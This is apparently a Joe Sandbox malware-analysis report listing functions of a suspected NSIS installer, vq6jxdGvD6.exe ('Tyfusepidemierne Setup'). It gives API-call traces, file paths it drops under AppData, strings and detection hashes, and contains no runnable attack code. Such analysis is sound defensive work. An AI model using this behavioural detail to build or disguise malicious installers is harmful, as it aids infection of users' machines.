C:\Users\user\AppData\Local\Temp\nsb129A.tmp, xrefs: 00406232

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\Users\user\AppData\Local\Temp\nsb129A.tmp
API String ID: 2295610775-531241618
Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction ID: 7cf403c7a0a34fa6c1bdd97e039e734b9fb45dc45bcdba9fead32da54c1b9644
Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
Instruction Fuzzy Hash: 19D0C9329090206BC3106628AC0C84B6A599B953717118A76B56AF12E0D238986286A9

Function 00403B1C Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B58
ShowWindow.USER32(?), ref: 00403B75
DestroyWindow.USER32 ref: 00403B89
SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA5
GetDlgItem.USER32(?,?), ref: 00403BC6
SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BDA
IsWindowEnabled.USER32(00000000), ref: 00403BE1
GetDlgItem.USER32(?,00000001), ref: 00403C8F
GetDlgItem.USER32(?,00000002), ref: 00403C99
SetClassLongA.USER32(?,000000F2,?), ref: 00403CB3
SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D04
GetDlgItem.USER32(?,00000003), ref: 00403DAA
ShowWindow.USER32(00000000,?), ref: 00403DCB
KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403DDD
EnableWindow.USER32(?,?), ref: 00403DF8
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0E
EnableMenuItem.USER32(00000000), ref: 00403E15
SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E2D
SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E40
lstrlenA.KERNEL32(Tyfusepidemierne Setup: Completed,?,Tyfusepidemierne Setup: Completed,00000000), ref: 00403E6A
SetWindowTextA.USER32(?,Tyfusepidemierne Setup: Completed), ref: 00403E79
ShowWindow.USER32(?,0000000A), ref: 00403FAD

Strings

Tyfusepidemierne Setup: Completed, xrefs: 00403E5A, 00403E60, 00403E69, 00403E77

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
String ID: Tyfusepidemierne Setup: Completed
API String ID: 3282139019-1459920134
Opcode ID: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
Instruction ID: f34c7ad61b4b1b4f5354d92f7eace51acccef8372a8e2d808ca2954a926f6951
Opcode Fuzzy Hash: 9cb3074a3fb103a6f3d47e7af7ff2d0ba242536aebbf1ca43321ce8251f687ac
Instruction Fuzzy Hash: 65C1B171A04205BBDB216F61ED45E2B7E7CFB45706F40443EF601B11E1C779A942AB2E

Function 0040377F Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004062C7: GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
Part of subcall function 004062C7: GetProcAddress.KERNEL32(00000000,?), ref: 004062F4

lstrcatA.KERNEL32(1033,Tyfusepidemierne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tyfusepidemierne Setup: Completed,00000000,00000002,76233410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\vq6jxdGvD6.exe",00000000), ref: 004037FA
lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Local\unshabbily,1033,Tyfusepidemierne Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Tyfusepidemierne Setup: Completed,00000000,00000002,76233410), ref: 0040386F
lstrcmpiA.KERNEL32(?,.exe), ref: 00403882
GetFileAttributesA.KERNEL32(: Completed), ref: 0040388D
LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\unshabbily), ref: 004038D6

Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A

RegisterClassA.USER32(00422EA0), ref: 00403913
SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0040392B
CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403960
ShowWindow.USER32(00000005,00000000), ref: 00403996
GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004039C2
GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004039CF
RegisterClassA.USER32(00422EA0), ref: 004039D8
DialogBoxParamA.USER32(?,00000000,00403B1C,00000000), ref: 004039F7

Strings

: Completed, xrefs: 0040383D, 00403845, 00403852, 0040389C, 004038A2
C:\Users\user\AppData\Local\unshabbily, xrefs: 00403809, 00403811, 004038A9, 004038AF, 004038BF
_Nb, xrefs: 004038F2, 0040395A
C:\Users\user\AppData\Local\Temp\, xrefs: 00403784
RichEdit, xrefs: 004039C9
1033, xrefs: 0040379F, 004037F5
.exe, xrefs: 0040387C
RichEd20, xrefs: 0040399C
.DEFAULT\Control Panel\International, xrefs: 004037E5
Tyfusepidemierne Setup: Completed, xrefs: 004037AB, 004037B1, 004037D6, 004037DF, 004037F4
Control Panel\Desktop\ResourceLocale, xrefs: 004037B3
"C:\Users\user\Desktop\vq6jxdGvD6.exe", xrefs: 00403783
RichEdit20A, xrefs: 004039BA, 004039C0
RichEd32, xrefs: 004039AA

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\vq6jxdGvD6.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\unshabbily$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$Tyfusepidemierne Setup: Completed$_Nb
API String ID: 1975747703-4140442772
Opcode ID: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
Instruction ID: d12dedd32edb2aff813830401e41f02ecd086126c72271397d80de36ce2b18ee
Opcode Fuzzy Hash: 0f0f9529c3c60786d72211f980a5a8b1144e6e1ba4f9bbe45dc6703203a272d1
Instruction Fuzzy Hash: 1E61C6B1744240BEE620BF669D45F373AACEB84759F40447EF940B22E2D77C9D029A2D

Function 00402D48 Relevance: 24.7, APIs: 5, Strings: 9, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402D59
GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\vq6jxdGvD6.exe,00000400), ref: 00402D75

Part of subcall function 00405AC8: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\vq6jxdGvD6.exe,80000000,00000003), ref: 00405ACC
Part of subcall function 00405AC8: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE

GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\vq6jxdGvD6.exe,C:\Users\user\Desktop\vq6jxdGvD6.exe,80000000,00000003), ref: 00402DC1

Strings

soft, xrefs: 00402E36
Null, xrefs: 00402E3F
C:\Users\user\Desktop\vq6jxdGvD6.exe, xrefs: 00402D5F, 00402D6E, 00402D82, 00402DA2
C:\Users\user\Desktop, xrefs: 00402DA3, 00402DA8, 00402DAE
C:\Users\user\AppData\Local\Temp\, xrefs: 00402D4F
Error launching installer, xrefs: 00402D98
Inst, xrefs: 00402E2D
"C:\Users\user\Desktop\vq6jxdGvD6.exe", xrefs: 00402D48
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F20

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\vq6jxdGvD6.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\vq6jxdGvD6.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-283858153
Opcode ID: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
Instruction ID: ef8309496f7f1060f742aea9483ad6a943d4cc908664d4bedc23fec409a9c2f2
Opcode Fuzzy Hash: 9cf78e836df077268a8f392ddbbc0cddc733458901816a9142e16d675eec763f
Instruction Fuzzy Hash: F251D5B1A40215ABDF209F65DE89B9E7AB8FB04355F10413BE900B62D1C7BC9E418B9D

Function 00405F51 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(: Completed,00000400), ref: 0040607C
GetWindowsDirectoryA.KERNEL32(: Completed,00000400,?,Completed,00000000,0040508E,Completed,00000000), ref: 0040608F
SHGetSpecialFolderLocation.SHELL32(0040508E,00000000,?,Completed,00000000,0040508E,Completed,00000000), ref: 004060CB
SHGetPathFromIDListA.SHELL32(00000000,: Completed), ref: 004060D9
CoTaskMemFree.OLE32(00000000), ref: 004060E5
lstrcatA.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 00406109
lstrlenA.KERNEL32(: Completed,?,Completed,00000000,0040508E,Completed,00000000,00000000,0040E8C0,00000000), ref: 0040615B

Strings

: Completed, xrefs: 00405F7B, 00406048, 00406049, 0040604A, 00406066, 0040607B, 0040608E, 004060AA, 004060D5, 00406108, 0040610E, 00406126, 00406139, 00406154, 0040615A, 00406162, 0040618C
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040604B
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406103
Completed, xrefs: 00405F76

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: : Completed$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-905382516
Opcode ID: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
Instruction ID: ad9c483c4d11e0ac1e74b91e3c17e9742ad78b5bc63621c1ce792900c2eda604
Opcode Fuzzy Hash: 4b83501bff14d3d4afc94545923638de13eab7723713207b83caa633bdf47479
Instruction Fuzzy Hash: 5361D0B1A00115ABDF209F64CD81BBA7BB4DB45304F15813FEA03BA2D2D27C4962DB5E

Function 00401759 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcatA.KERNEL32(00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily\Toral,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,307,307,00000000,00000000,307,C:\Users\user\AppData\Local\unshabbily\Toral,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405F2F: lstrcpynA.KERNEL32(?,?,00000400,0040328D,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405F3C

Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Strings

C:\Users\user\AppData\Local\unshabbily\Toral, xrefs: 00401786
307, xrefs: 00401775, 0040177E, 0040178B, 0040179D, 004017AE, 004017E4, 004017FA, 00401818, 00401858, 004018D9, 004018E2, 004018EC, 004018F7
open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo, xrefs: 00401826, 00401842

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: 307$C:\Users\user\AppData\Local\unshabbily\Toral$open C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Hilltrot242.Boo
API String ID: 1941528284-3581691670
Opcode ID: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
Instruction ID: 5e97bff851cc073dc2a03fd3a0d2357d8c44b4856d4f0a7a75adeada814ade30
Opcode Fuzzy Hash: b7839a92209b7c6b3c8202a481ff6992844c1a0f6516a3d4c6bbc740c4310d88
Instruction Fuzzy Hash: 7A41E771A10516BACF107BA5DC86DAF3A78DF45369B20823BF525F11E1C63C8A418E6D

Function 00405056 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112

Strings

Completed, xrefs: 00405076, 00405088, 0040508E, 004050B1, 004050BD

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Completed
API String ID: 2531174081-3087654605
Opcode ID: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
Instruction ID: e673b9bb112aa3472437e231988a5d641118b75a6dbc9ddacfe4bdcedf5bb5e7
Opcode Fuzzy Hash: 7a30fd5aa95a704ddc080644221cac8ba995af417aa6bdfbb55c98406b985727
Instruction Fuzzy Hash: 49217A71A00508BBDF11DFA5DD80ADFBFA9EB08354F14807AF944A6291C2788A41CFA8

Function 0040551C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040555F
GetLastError.KERNEL32 ref: 00405573
SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405588
GetLastError.KERNEL32 ref: 00405592

Strings

C:\Users\user\Desktop, xrefs: 0040551C
ds@, xrefs: 00405551
ts@, xrefs: 00405522
C:\Users\user\AppData\Local\Temp\, xrefs: 00405542

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
API String ID: 3449924974-3329011080
Opcode ID: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction ID: 8a370a5fbdfdad71dc8e0bfd81c54348e454926cd11c3a1ff2f48966e6f5c6f5
Opcode Fuzzy Hash: 96d3186a9d907c4a04f4d560a3e7b71f397f10da171c1ba48397c58d76b22fd5
Instruction Fuzzy Hash: D0010871D04259EAEF01DBA1CC447EFBBB9EB04354F00857AD904B6290E378A604CFAA

Function 00406259 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
wsprintfA.USER32 ref: 004062A9
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD

Strings

UXTHEME, xrefs: 00406262
\, xrefs: 00406281
%s%s.dll, xrefs: 004062A3

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction ID: 482dcefc063d93e198aa1db7e000bfd15e9281d4181d763578a6ff71fc22a1d9
Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
Instruction Fuzzy Hash: EAF0F630A10109AEDF14ABA4DD0DFFB375CAB08304F1405BAB64AE11D2E678E9248B69

Function 00402F81 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00402FDF
GetTickCount.KERNEL32 ref: 00403060
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 0040308D
wsprintfA.USER32 ref: 0040309D

Strings

... %d%%, xrefs: 00403097

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181382233.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_vq6jxdGvD6.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: ... %d%%
API String ID: 551687249-2449383134
Opcode ID: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
Instruction ID: 60d675f18a734e15d0b5dd350d1cecbd4da5e6a0cde0341d3a53a3cb480860e8
Opcode Fuzzy Hash: 167b5ca0bfb3e57695ff9e62e4c69d0835ce9269e9eafab78b1523a358312806
Instruction Fuzzy Hash: FA519F71901219DBCB10EF65D9046AF7BB8AB04756F14413BF811B72C1C7789E51CBAA

Function 00405AF7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405B0B
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B25

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405AFA
"C:\Users\user\Desktop\vq6jxdGvD6.exe", xrefs: 00405AF7
nsa, xrefs: 00405B02

Memory Dump Source

Source File: 00000000.00000002.2181216551.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2181199468.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181240977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181258980.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
